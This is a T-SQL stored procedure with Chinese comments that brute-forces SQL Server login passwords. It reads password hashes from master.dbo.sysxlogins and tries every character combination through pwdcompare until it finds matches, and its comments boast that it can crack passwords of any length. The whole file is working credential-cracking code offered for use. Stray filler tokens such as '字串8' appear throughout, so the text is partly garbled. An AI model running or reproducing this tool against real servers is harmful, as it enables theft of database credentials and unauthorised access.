if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) 字串8
drop procedure [dbo].[p_GetPassword] 字串2
GO
/*--穷举法破解 SQL Server 用户密码 字串4
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII 字串7
理论上可以破解任意位数的密码
字串1
条件是你的电脑配置足够,时间足够
/*--调用示例 字串6
exec p_GetPassword
--*/
字串7
create proc p_GetPassword 字串5
@username sysname=null, --用户名,如果不指定,则列出所有用户 字串5
@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的
字串7
as 字串8
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end
字串3
select top 255 id=identity(int,0,1) into #t from syscolumns
字串5
alter table #t add constraint PK_#t primary key(id) 字串3
select name,password 字串2
,type=case when xstatus&2048=2048 then 1 else 0 end 字串3
,jm=case when password is null then 1 else 0 end 字串2
,pwdstr=cast('' as sysname) 字串1
,pwd=cast('' as varchar(8000))
字串6
into #pwd
from master.dbo.sysxlogins a
字串7
where srvid is null 字串1
and name=isnull(@username,name)
字串7
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000) 字串8
declare @l int 字串9
select @l=0 字串7
,@s1='char(aa.id)' 字串4
,@s2='cast(aa.id as varchar)'
字串1
,@s3=',#t aa'
exec(' 字串4
update pwd set jm=1,pwdstr='+@s1+'
字串7
,pwd='+@s2+' 字串6
from #pwd pwd'+@s3+' 字串1
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1 字串7
') 字串4
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen) 字串7
begin
select @l=@l+1 字串4
,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
字串8
,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)' 字串6
,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
exec('
update pwd set jm=1,pwdstr='+@s1+'
字串4
,pwd='+@s2+'
字串9
from #pwd pwd'+@s3+'
where pwd.jm=0 字串8
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
') 字串9
end
字串9
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd 字串9
go
字串3